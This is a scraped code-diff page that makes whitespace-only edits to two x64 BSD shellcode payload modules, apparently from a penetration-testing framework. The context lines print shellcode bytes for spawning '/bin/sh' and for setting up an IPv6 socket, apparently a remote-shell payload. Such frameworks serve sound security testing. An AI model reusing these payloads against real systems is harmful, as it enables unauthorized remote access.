File tree Expand file tree Collapse file tree 2 files changed +3
-3
lines changed
modules/payloads/singles/bsd/x64 Expand file tree Collapse file tree 2 files changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -69,7 +69,7 @@ def initialize(info = {})
69
69
"\x0f \x05 " +# syscall #
70
70
"\x52 " +# push %rdx #
71
71
"\x48 \xbf \x2f \x2f \x62 " +# mov "//b" #
72
- "\x69 \x6e \x2f \x73 \x68 " +# mov "in/sh",%rdi #
72
+ "\x69 \x6e \x2f \x73 \x68 " +# mov "in/sh",%rdi #
73
73
"\x57 " +# push %rdi #
74
74
"\x48 \x89 \xe7 " +# mov %rsp,%rdi #
75
75
"\x52 " +# push %rdx #
Original file line number Diff line number Diff line change @@ -53,7 +53,7 @@ def initialize(info = {})
53
53
"\x04 \x58 " +# add $0x58,%al #
54
54
"\x0f \x05 " +# syscall #
55
55
"\xe9 \x23 \x00 \x00 \x00 " +# jmpq <forth> #
56
- # back:
56
+ # back:
57
57
"\x5e " +# pop %rsi #
58
58
"\x6a \x1c " +# pushq $0x1c #
59
59
"\x5a " +# pop %rdx #
@@ -72,7 +72,7 @@ def initialize(info = {})
72
72
"\x0f \x05 " +# syscall #
73
73
# forth:
74
74
"\xe8 \xd8 \xff \xff \xff " +# callq <back> #
75
- # sockaddr_in6
75
+ # sockaddr_in6
76
76
"\x00 \x1c \x11 \x5c " +# AF_INET6+port #
77
77
"\x00 \x00 \x00 \x00 " +# no-one-cares #
78
78
"\x00 \x00 \x00 \x00 " +# IPv6- #
You can’t perform that action at this time.
0 commit comments